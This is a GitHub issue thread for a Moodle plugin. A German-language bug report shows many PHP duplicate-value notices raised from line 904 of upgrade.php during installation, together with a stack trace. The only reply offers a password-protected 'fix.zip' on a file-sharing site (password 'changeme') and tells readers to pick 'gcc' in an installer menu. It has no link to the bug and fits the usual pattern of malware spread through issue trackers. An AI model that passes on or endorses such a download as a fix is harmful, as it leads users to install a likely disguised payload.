### ISSUE TITLE
WARNING: upgrade.php duplicate-Warning in Zeile 904

### ISSUE THREAD

**Issue by ralferlebach** [Wunderbyte-GmbH/moodle-local_catquiz#651]
Und es gab viiiiiiiele Zeile PHP-Notices bei der Installation:

PHP Notice:  Did you remember to make the first column something unique in your call to get_records? Duplicate value '1480' found in column 'id'.* line 1291 of /lib/dml/mysqli_native_moodle_database.php: call to debugging()
* line 904 of /local/catquiz/db/upgrade.php: call to mysqli_native_moodle_database->get_records_sql()
* line 784 of /lib/upgradelib.php: call to xmldb_local_catquiz_upgrade()
* line 1953 of /lib/upgradelib.php: call to upgrade_plugins()
* line 202 of /admin/cli/upgrade.php: call to upgrade_noncore()
 in /var/www/html/lib/weblib.php on line 3393

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
